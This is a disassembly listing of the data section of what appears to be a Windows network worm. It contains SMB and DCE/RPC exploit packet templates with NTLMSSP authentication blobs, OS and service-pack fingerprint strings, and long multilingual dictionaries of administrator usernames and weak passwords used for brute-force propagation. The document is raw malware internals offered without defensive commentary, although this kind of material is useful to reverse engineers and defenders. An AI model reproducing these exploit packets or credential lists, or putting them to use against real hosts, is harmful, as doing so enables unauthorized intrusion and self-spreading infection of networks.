dd 10h, 20400010h, 404000h, 20404010h, 400000h, 4010h
dd 20000010h, 400000h, 20004000h, 20000000h, 4010h, 20000010h
dd 20404010h, 404000h, 20400000h, 404010h, 20404000h, 0
dd 20400010h, 10h, 4000h, 20400000h, 404010h, 4000h, 400010h
dd 20004010h, 0
dd 20404000h, 20000000h, 400010h, 20004010h
dword_43B478 dd 200000h ; sub_403721+16B�r
dd 4200002h, 4000802h, 0
dd 800h, 4000802h, 200802h, 4200800h, 4200802h, 200000h
dd 0
dd 4000002h, 2, 4000000h, 4200002h, 802h, 4000800h, 200802h
dd 200002h, 4000800h, 4000002h, 4200000h, 4200800h, 200002h
dd 4200000h, 800h, 802h, 4200802h, 200800h, 2, 4000000h
dd 200800h, 4000000h, 200800h, 200000h, 2 dup(4000802h)
dd 2 dup(4200002h), 2, 200002h, 4000000h, 4000800h, 200000h
dd 4200800h, 802h, 200802h, 4200800h, 802h, 4000002h, 4200802h
dd 4200000h, 200800h, 0
dd 2, 4200802h, 0
dd 200802h, 4200000h, 800h, 4000002h, 4000800h, 800h, 200002h
dword_43B578 dd 10001040h ; sub_403721+1AC�r
dd 1000h, 40000h, 10041040h, 10000000h, 10001040h, 40h
dd 10000000h, 40040h, 10040000h, 10041040h, 41000h, 10041000h
dd 41040h, 1000h, 40h, 10040000h, 10000040h, 10001000h
dd 1040h, 41000h, 40040h, 10040040h, 10041000h, 1040h
dd 2 dup(0)
dd 10040040h, 10000040h, 10001000h, 41040h, 40000h, 41040h
dd 40000h, 10041000h, 1000h, 40h, 10040040h, 1000h, 41040h
dd 10001000h, 40h, 10000040h, 10040000h, 10040040h, 10000000h
dd 40000h, 10001040h, 0
dd 10041040h, 40040h, 10000040h, 10040000h, 10001000h
dd 10001040h, 0
dd 10041040h, 2 dup(41000h), 2 dup(1040h), 40040h, 10000000h
dd 10041000h
dword_43B678 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_43B6C8 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_403970+FB�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_43BA2C dd 20h, 0 dd 20h, 5C005Ch, 0
off_43BA40 dd offset loc_43005C ; DATA XREF: sub_403970+135�o
dd offset dword_5C0024
a12345611111111:
unicode 0, <123456111111111111111.doc>,0
align 10h
dword_43BA80 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
off_43BAB4 dd offset word_580046 ; DATA XREF: sub_403970+31�o
; sub_403970+72�o
dd offset loc_42004E
dd offset word_580046
dd offset word_580046
dd offset loc_42004E
dd offset word_580046
dd offset word_580046
dd offset word_580046
dd offset word_580046
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_43BB90 dd 10016C6h dword_43BB94 dd 100139Dh dword_43BB98 dd 158h align 10h
dword_43BBA0 dd 30B0005h, 10h, 48h, 0 dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_43BBEC dd 3000005h, 10h, 5 dup(0)dword_43BC08 dd 10005h, 2 dup(0) dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_43BC50 dd 0 dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
; ---------------------------------------------------------------------------
loc_43BC84: ; DATA XREF: .text:00403EB0�o
mov eax, [esp-4]
add eax, 0FFFFFAE0h
jmp eax
; ---------------------------------------------------------------------------
align 10h
loc_43BC90: ; DATA XREF: .text:00403E5B�o
mov eax, [ebp+30h]
add eax, 0FFFFFB24h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_43BC9C: ; DATA XREF: .text:00403EFF�o
jmp short loc_43BCAE
; ---------------------------------------------------------------------------
jmp short loc_43BCB9
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_43BCA4: ; DATA XREF: .text:00403F5A�o
jmp short near ptr word_43BCAA
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
word_43BCAA dw 0 ; CODE XREF: .text:loc_43BCA4�j
; ---------------------------------------------------------------------------
loc_43BCAC: ; DATA XREF: .text:00403F7B�o
jmp short near ptr word_43BCB2
; ---------------------------------------------------------------------------
loc_43BCAE: ; CODE XREF: .text:loc_43BC9C�j
; .text:loc_43BCCC�j
jmp short loc_43BCB4
; ---------------------------------------------------------------------------
db 2 dup(0)
word_43BCB2 dw 0 ; CODE XREF: .text:loc_43BCAC�j
; ---------------------------------------------------------------------------
loc_43BCB4: ; CODE XREF: .text:loc_43BCAE�j
; DATA XREF: .text:00403F9F�o
jmp short near ptr loc_43BCB9+1
; ---------------------------------------------------------------------------
dw 0FFFFh
db 0FFh
; ---------------------------------------------------------------------------
loc_43BCB9: ; CODE XREF: .text:0043BC9E�j
; .text:loc_43BCB4�j
inc dword ptr [eax]
; ---------------------------------------------------------------------------
db 0
off_43BCBC dd offset loc_410058+4 ; DATA XREF: .text:00403FEE�o
dd 2 dup(0)
dword_43BCC8 dd 77F33723h ; ---------------------------------------------------------------------------
loc_43BCCC: ; DATA XREF: .text:00403F38�o
jmp short loc_43BCAE
; ---------------------------------------------------------------------------
dw 7FFDh
; ---------------------------------------------------------------------------
loc_43BCD0: ; DATA XREF: .text:00403F11�o
lahf
jnz short loc_43BCEB
loc_43BCD3: ; DATA XREF: .text:00403EA0�o
add [ecx+1Ch], bl
loc_43BCD6: ; CODE XREF: .text:loc_43BCE0�j
add [ecx], al
loc_43BCD8: ; DATA XREF: .text:00403E82�o
or ecx, [ebx]
sbb eax, [eax]
loc_43BCDC: ; DATA XREF: .text:00403E91�o
jmp short near ptr dword_43BCE4
; ---------------------------------------------------------------------------
align 10h
loc_43BCE0: ; DATA XREF: .text:00403E6D�o
jmp short loc_43BCD6
; ---------------------------------------------------------------------------
align 4
dword_43BCE4 dd 0 byte_43BCE8 db 5, 0, 0Bh ; DATA XREF: sub_404134+298�o
; ---------------------------------------------------------------------------
loc_43BCEB: ; CODE XREF: .text:0043BCD1�j
add edx, [eax]
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 48h, 7Fh, 16D016D0h, 0
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_43BD38 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_404134+17F�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_43C09C dd 20h, 0 dd 20h, 5C005Ch, 0
off_43C0B0 dd offset loc_43005C ; DATA XREF: sub_404134+1B9�o
dd offset dword_5C0024
a123456111111_0:
unicode 0, <123456111111111111111.doc>,0
align 10h
dword_43C0F0 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
off_43C124 dd offset word_580046 ; DATA XREF: sub_404134+A2�o
; sub_404134+F2�o
dd offset loc_42004E
dd offset word_580046
dd offset word_580046
dd offset loc_42004E
dd offset word_580046
dd offset word_580046
dd offset word_580046
dd offset word_580046
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrr_0 db ''
db ''
db '',0
dword_43C200 dd 10016C6h dword_43C204 dd 100139Dh dword_43C208 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; sub_404525+C01�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_43C254 dd 3000005h, 10h, 18h, 1, 3 dup(0) ; sub_404525+C40�o
dword_43C270 dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: sub_404525+B1B�o
; sub_404525+C75�o
dword_43C284 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_404525+B3F�o
; sub_404525+C9C�o
unk_43C298 db 81h ; ; DATA XREF: sub_404525+AA�o
; sub_404525+916�o
db 2 dup(0), 44h
aCkfdenecfdef_0 db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aEkedfeeiedcaca db ' EKEDFEEIEDCACACACACACACACACACAAA',0
dd 0
dword_43C2E4 dd 2F000000h, 424D53FFh, 72h, 4 dup(0) ; sub_404525+948�o
dd 25C0000h, 0
dd 2000C00h, 4C20544Eh, 2E30204Dh, 3231h
dword_43C318 dd 48000000h, 424D53FFh, 73h, 4 dup(0) ; sub_404525+973�o
dd 25C0000h, 0
dd 0FF0Dh, 2FFFF00h, 25C00h, 2 dup(0)
dd 1000000h, 0B000000h, 6E000000h, 79700074h, 626D73h
dd 0
db 81h ;
db 2 dup(0), 44h
aCkfdenecfdef_1 db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aEkedfeeiedca_0 db ' EKEDFEEIEDCACACACACACACACACACAAA',0
dd 2 dup(0)
dword_43C3B8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_404525+2C8�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_43C448 dd 0B9000000h, 424D53FFh, 73h, 28011800h, 3 dup(0)
; DATA XREF: sub_404525+2FC�o
dd 0C0750000h, 6DD70000h, 0FF0Ch, 2FFDF00h, 100h, 5B000000h
dd 0
db 0
db 5Ch, 0D0h, 0
db 80h ; €
db 7Eh, 0, 60h
db 59h ; Y
db 2 dup(6), 2Bh
db 6
db 1, 2 dup(5)
db 2
db 0A0h, 4Fh, 30h
db 4Dh ; M
db 0A0h, 0Eh, 30h
db 0Ch
db 6, 0Ah, 2Bh
db 6
db 1, 4, 1
db 82h ; ‚
db 37h, 2 dup(2)
db 0Ah
db 0A2h, 3Bh, 4
a9ntlmssp db '9NTLMSSP',0
db 1, 2 dup(0)
db 0
db 1, 2, 8
db 0
db 9, 0, 9
db 0
db 20h, 2 dup(0)
db 0
db 10h, 0, 10h
db 0
db 29h, 2 dup(0)
db 0
aWorkgrouplqpxf db 'WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195',0
aWindows20005_0 db 'Windows 2000 5.0',0
align 4
dword_43C508 dd 0D010000h, 424D53FFh, 73h, 28011800h, 3 dup(0)
; DATA XREF: sub_404525+381�o
dd 0C0750000h
dword_43C528 dd 6DD72000h, 0FF0Ch, 2FFDF00h, 100h, 0AF000000h, 0
; DATA XREF: sub_404525+36E�o
dd 0D05C00h, 0A100D280h, 8130AC81h, 0A681A2A9h, 4EA38104h
dd 534D4C54h, 3005053h, 18000000h, 40001800h, 18000000h
dd 58001800h, 12000000h, 70001200h, 0
dd 82000000h, 20000000h, 82002000h, 0
dd 0A2000000h, 1000000h, 0ED000802h, 778839B7h, 0BE16D7h
dd 3 dup(0)
db 0
db 2 dup(0), 42h
db 0AEh ; ®
db 0B7h, 1Fh, 0BBh
db 6Dh ; m
db 0C1h, 84h, 99h
db 1
aKXEcTijW db 'k',8,'±xºeC',0Ah
db 'ÓšâI†)W',0
dd offset byte_52004F
dd offset byte_47004B
dd offset word_4F0052
dd offset byte_500055
dd offset dword_51006C
db 50h, 0, 78h
db 0
db 66h, 0, 32h
db 0
dd offset byte_530049
dd offset byte_670051
dd offset byte_560045
dd offset byte_620031
dd offset byte_4B0047
align 2
aWindows2000219 db 'Windows 2000 2195',0
aWindows20005_1 db 'Windows 2000 5.0',0
align 10h
dword_43C620 dd 6B000000h, 424D53FFh, 73h, 20011800h, 3 dup(0)
; DATA XREF: sub_404525+3B2�o
dd 0C0750000h, 6DD70000h, 0FF0Dh, 2FFDF00h, 100h, 2 dup(0)
dd 40000000h, 2E000000h, 4F570000h, 52474B52h, 50554Fh
aWindows20002_0 db 'Windows 2000 2195',0
aWindows20005_2 db 'Windows 2000 5.0',0
align 10h
dword_43C690 dd 37000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_404525+3FF�o
dd 0C0750000h
dword_43C6B0 dd 6DD72001h, 0FF04h, 1000000h, 0C00h, 24435049h, 3F3F3F00h
; DATA XREF: sub_404525+3EF�o
dd 3F3Fh, 0
dword_43C6D0 dd 5C000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_404525+4D1�o
; sub_404525+6D3�o
dword_43C6EC dd 4780800h ; sub_404525+6B3�o
dword_43C6F0 dd 400800h, 0DE00FF18h, 800DEh, 16h, 0 ; sub_404525+6C3�o
dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 5C000903h, 574F5242h, 524553h, 2 dup(0)
dword_43C738 dd 5B000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_404525+468�o
dword_43C754 dd 4780800h dword_43C758 dd 400800h, 0DE00FF18h, 700DEh, 16h, 0 dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 5C000803h, 53565253h, 4356h
dword_43C798 dd 3F020000h, 424D53FFh, 2Fh, 20011800h, 3 dup(0)
; DATA XREF: sub_404525+54D�o
; sub_404525+74F�o
dword_43C7B4 dd 4780800h ; sub_404525+71C�o
dword_43C7B8 dd 400800h, 0FF0Eh ; sub_404525+72C�o
db 0
byte_43C7C1 db 0, 40h, 0 ; DATA XREF: sub_404525+53A�o
; sub_404525+73C�o
dd 0FF000000h, 8FFFFFFh, 20000h, 3F020000h, 0
dd 5020000h, 10030B00h, 0
dd 2, 0D0000000h, 16D016h, 0B000000h, 0
dd 84000100h, 1FB33323h, 2C0E9508h, 0C32C304Ah, 1830708h
dd 4000300h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 1000000h, 0BE000100h, 54A71E0Eh, 91E02161h, 23E45A04h
dd 2D082E6h, 4000300h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h
dd 2604810h, 2000000h, 0E9000100h, 0E77F4FDFh, 0A54D6B2Bh
dd 833CAAD4h, 0A10315h, 4000200h, 0EB8A885Dh, 9F11C91Ch
dd 2B0008E8h, 2604810h, 3000000h, 0AD000100h, 19D89A50h
dd 1CF35CB9h, 0AD534199h, 175601Eh, 4000000h, 0EB8A885Dh
dd 9F11C91Ch, 2B0008E8h, 2604810h, 4000000h, 97000100h
dd 409F7E21h, 0D7BEC99Eh, 0F1B0A4EBh, 595FE37h, 4000300h
dd 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h, 5000000h
dd 0FD000100h, 858B52C8h, 8B3A74CCh, 30E02915h, 216ACCDh
dd 4000100h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 6000000h, 5B000100h, 0E19ACBDEh, 1F728325h, 92A2A310h
dd 7636E7h, 4000200h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h
dd 2604810h, 7000000h, 74000100h, 9C0CDF4h, 0BEF37F2Dh
dd 0C3573B8h, 1685206h, 4000000h, 0EB8A885Dh, 9F11C91Ch
dd 2B0008E8h, 2604810h, 8000000h, 0E5000100h, 0E1EA256Ch
dd 4AC21B8Ah, 29885617h, 106C3EEh, 4000200h, 0EB8A885Dh
dd 9F11C91Ch, 2B0008E8h, 2604810h, 9000000h, 26000100h
dd 4D7D7050h, 7BAF8288h, 0EA1D963Dh, 29A17EBh, 4000100h
dd 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h, 0A000000h
dd 0C8000100h, 704B324Fh, 1201D316h, 0BF475A78h, 388E16Eh
dd 4000000h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 2 dup(0)
dword_43C9E0 dd 3B000000h, 424D53FFh, 2Eh, 20011800h, 3 dup(0)
; DATA XREF: sub_404525+5BD�o
; sub_404525+66D�o ...
dword_43C9FC dd 4780800h ; sub_404525+78F�o
dword_43CA00 dd 400800h, 0FF0Ah ; sub_404525+79F�o
db 0
byte_43CA09 db 0, 40h, 0 ; DATA XREF: sub_404525+5AD�o
; sub_404525+7AF�o
dd 80000000h, 0FFBB80BBh, 0FFFFFFh, 2 dup(0)
dword_43CA20 dd 0A3000000h, 424D53FFh, 2Fh, 20011800h, 3 dup(0)
; DATA XREF: sub_404525+630�o
dword_43CA3C dd 4780800h dword_43CA40 dd 400800h, 0FF0Eh db 0
byte_43CA49 db 0, 40h, 16h ; DATA XREF: sub_404525+61D�o
dd 0FF000000h, 8FFFFFFh, 6400h, 3F006400h, 0
dd 5006400h, 10030000h, 64000000h, 0
dd 4C000000h, 0A000000h, 1B002200h, 745AB37h, 0
dd 7000000h, 69000000h, 48004600h, 6C006E00h, 4E00h, 0A000000h
dd 0
dd 0A000000h, 6B000000h, 44007600h, 76007300h, 70004300h
dd 71005400h, 1000000h, 0FAh, 2 dup(0)
dword_43CAC8 dd 6F000000h, 424D53FFh, 2Fh, 20011800h, 3 dup(0)
; DATA XREF: sub_404525+82F�o
dword_43CAE4 dd 304F0800h dword_43CAE8 dd 7C540801h, 0FF0Eh db 0
byte_43CAF1 db 1, 40h, 49h ; DATA XREF: sub_404525+81F�o
dd 0FF000001h, 8FFFFFFh, 3000h, 3F003000h, 0
dd 5003000h, 10030000h, 30000000h, 0
dd 18000000h, 0A000000h, 35001C00h, 3329DE9h, 0
dd 3000000h, 4B000000h, 4700h, 0
dword_43CB3C dd 65706970h, 6D70655Ch, 65707061h, 72hdword_43CB4C dd 73255C5Ch, 5Ch ; sub_4097B9+18F�o ...
dword_43CB54 dd 646E6957h, 2073776Fh, 302E35haWindows2000Lan db 'Windows 2000 LAN Manager*',0 ; DATA XREF: sub_404525+A29�o
align 4
aWindowsServer2 db 'Windows Server 2003 *.*',0 ; DATA XREF: sub_404525+A0A�o
aSamba db 'Samba *',0 ; DATA XREF: sub_404525+237�o
aWindows5_1 db 'Windows 5.1',0 ; DATA XREF: sub_404525+21D�o
; sub_404525+349�o
aNtLanManager_ db 'NT LAN Manager *.*',0 ; DATA XREF: sub_404525+1E7�o
align 4
aServicePack2 db '*Service Pack 2*',0 ; DATA XREF: sub_404525+1C5�o
align 10h
aServicePack1 db '*Service Pack 1*',0 ; DATA XREF: sub_404525+1AA�o
align 8
off_43CBE8 dd offset byte_454A54 ; DATA XREF: sub_4059BF+188�r
; sub_4059BF+190�o
dd offset aAdministrator ; "Administrator"
dd offset aAdmin ; "Admin"
dd offset aAdministrador ; "Administrador"
dd offset aAdministrateur ; "Administrateur"
dd offset aAdministrada ; "Administrada"
dd offset aAdministratoro ; "Administratoro"
dd offset aAdministrado_0 ; "Administrador'"
dd offset aAdministratore ; "Administratore"
dd offset aAdministratori ; "Administratori"
dd offset aAdministration ; "Administration"
dd offset aAdministrators ; "Administrators"
dd offset dword_43DD3C
dd offset dword_43DD2C
dd offset aAdministracion ; "Administracion"
dd offset aBeheerder ; "Beheerder"
dd offset aRendszergazda ; "Rendszergazda"
dd offset aVerwalter ; "Verwalter"
dd offset aHallintovirkai ; "Hallintovirkailijat"
dd offset aAmministratore ; "Amministratore"
dd offset aContgenerale ; "Contgenerale"
dd offset aXxxxxx ; "xxxxxx"
dd offset aDefault_0 ; "Default"
dd offset aDefault_1 ; "default"
dd offset aServer ; "Server"
dd offset aUtilizador ; "Utilizador"
dd offset aServidor ; "Servidor"
dd offset aServeur ; "serveur"
dd offset aManager ; "manager"
dd offset aSystem_0 ; "SYSTEM"
dd offset aAdm ; "adm"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "ADMIN"
dd offset aAdmin1 ; "Admin1"
dd offset aOwner ; "owner"
dd offset aRoot ; "root"
dd offset aApacheServer ; "apache server"
dd offset aHttpd ; "httpd"
dd offset aStandard ; "Standard"
dd offset aMaster ; "master"
dd offset aThomas ; "thomas"
dd offset aArsenal ; "arsenal"
dd offset aMonkey ; "monkey"
dd offset aCharlie ; "charlie"
dd offset aLiverpool ; "liverpool"
dd offset aLuna ; "luna"
dd offset aRdp ; "rdp"
dd offset aAsp_net ; "ASP.NET"
dd offset a01 ; "01"
dd offset a02 ; "02"
dd offset a03 ; "03"
dd offset a04 ; "04"
dd offset a05 ; "05"
dd offset aBlah ; "blah"
dd offset aClient ; "Client"
dd offset aClient01 ; "Client01"
dd offset aClient02 ; "Client02"
dd offset aClient03 ; "Client03"
dd offset aClient04 ; "Client04"
dd offset aClient05 ; "Client05"
dd offset aBillGates ; "bill gates"
dd offset aDivx ; "DiVX"
dd offset aDivxServer ; "DiVX-SERVER"
dd offset aExploited ; "exploited"
dd offset dword_43DB48
dd offset off_43DB44
dd offset aGameServer ; "game server"
dd offset aGameserver ; "gameserver"
dd offset aSudo ; "sudo"
dd offset aBox ; "box"
dd offset aBox1 ; "box1"
dd offset aBox2 ; "box2"
dd offset aBox3 ; "box3"
dd offset aBox4 ; "box4"
dd offset aBox5 ; "box5"
dd offset aGuest ; "guest"
dd offset a31337 ; "31337"
dd offset a@_5 ; "!@"
dd offset a@_4 ; "!@#"
dd offset a@_3 ; "!@#$"
; ---------------------------------------------------------------------------
rcr dl, 1
inc ebx
add al, cl
fiadd dword ptr [ebx+0]
rcr dl, 43h
add [eax-4FFFBC26h], bh
fiadd dword ptr [ebx+0]
lodsb
fiadd dword ptr [ebx+0]
test al, 0DAh
inc ebx
add [edx+ebx*8-255FFFBDh], ah
inc ebx
add [edx+ebx*8-2567FFBDh], bl
inc ebx
add [eax-7BFFBC26h], dl
fiadd dword ptr [ebx+0]
sbb dl, 43h
add [eax-26h], bh
inc ebx
add [eax-26h], dh
inc ebx
add [edx+ebx*8+43h], ch
add [eax-26h], ch
loc_43CD6E: ; CODE XREF: .text:0043CD90�j
inc ebx
add [edx+ebx*8+43h], ah
add [edx+ebx*8+43h], bl
add [eax-26h], bl
inc ebx
add [eax-26h], dl
inc ebx
add [eax-26h], al
inc ebx
add [eax], bh
fiadd dword ptr [ebx+0]
xor dl, bl
inc ebx
add [eax], ch
fiadd dword ptr [ebx+0]
js short loc_43CD6E
inc ebx
add [edx+ebx*8], bl
inc ebx
add [eax], dl
fiadd dword ptr [ebx+0]
or dl, bl
inc ebx
; ---------------------------------------------------------------------------
db 0
dd offset aAccount ; "account"
dd offset aAccounting ; "accounting"
dd offset aProftpd ; "proftpd"
dd offset aFtpd ; "ftpd"
dd offset aWarftpd ; "warftpd"
dd offset aLighthttpd ; "lightHTTPD"
dd offset aSlimftp ; "slimftp"
dd offset aServU ; "serv-u"
dd offset aServUFtp ; "Serv-U FTP"
dd offset aProfessional ; "Professional"
dd offset aPc01 ; "pc01"
dd offset aPc02 ; "pc02"
dd offset aPc03 ; "pc03"
dd offset aPc04 ; "pc04"
dd offset aPc05 ; "pc05"
dd offset aBoss ; "BOSS"
dd offset off_43D970
dd offset aFormationplus ; "FormationPLUS"
dd offset dword_43D954
dd offset aWww ; "www"
dd offset aWebserver ; "webserver"
dd offset asc_43D940 ; "X"
dd offset aY ; "y"
dd offset aXxxxxx ; "xxxxxx"
dd 2 dup(0)
off_43CE08 dd offset byte_454A54 ; DATA XREF: sub_405965+3�r
; sub_405965+F�o
dd offset asc_43D938 ; " "
dd offset aAdministrator ; "Administrator"
dd offset aAdministrador ; "Administrador"
dd offset aAdministrateur ; "Administrateur"
dd offset aAdministrada ; "Administrada"
dd offset aAdministratoro ; "Administratoro"
dd offset aAdministrado_0 ; "Administrador'"
dd offset aAdministratore ; "Administratore"
dd offset aAdministratori ; "Administratori"
dd offset aAdministration ; "Administration"
dd offset aAdministrators ; "Administrators"
dd offset aAdmin_1 ; "admin"
dd offset aAdmin123 ; "admin123"
dd offset aAccess ; "Access"
dd offset aAdministrato_0 ; "administrator"
dd offset dword_43DD3C
dd offset dword_43DD2C
dd offset aAdministracion ; "Administracion"
dd offset aBeheerder ; "Beheerder"
dd offset aRendszergazda ; "Rendszergazda"
dd offset aVerwalter ; "Verwalter"
dd offset aHallintovirk_0 ; "hallintovirkailijat"
dd offset aAmministratore ; "Amministratore"
dd offset aManager ; "manager"
dd offset aContgenerale ; "Contgenerale"
dd offset aDefault_0 ; "Default"
dd offset aStandard ; "Standard"
dd offset aUtilizador ; "Utilizador"
dd offset aOwner ; "owner"
dd offset aSystem_0 ; "SYSTEM"
dd offset aThomas ; "thomas"
dd offset aArsenal ; "arsenal"
dd offset aMonkey ; "monkey"
dd offset aCharlie ; "charlie"
dd offset aAdm ; "adm"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "ADMIN"
dd offset aAdmin1 ; "Admin1"
dd offset aSudo ; "sudo"
dd offset aLiverpool ; "liverpool"
dd offset aBoss ; "BOSS"
dd offset aDivx ; "DiVX"
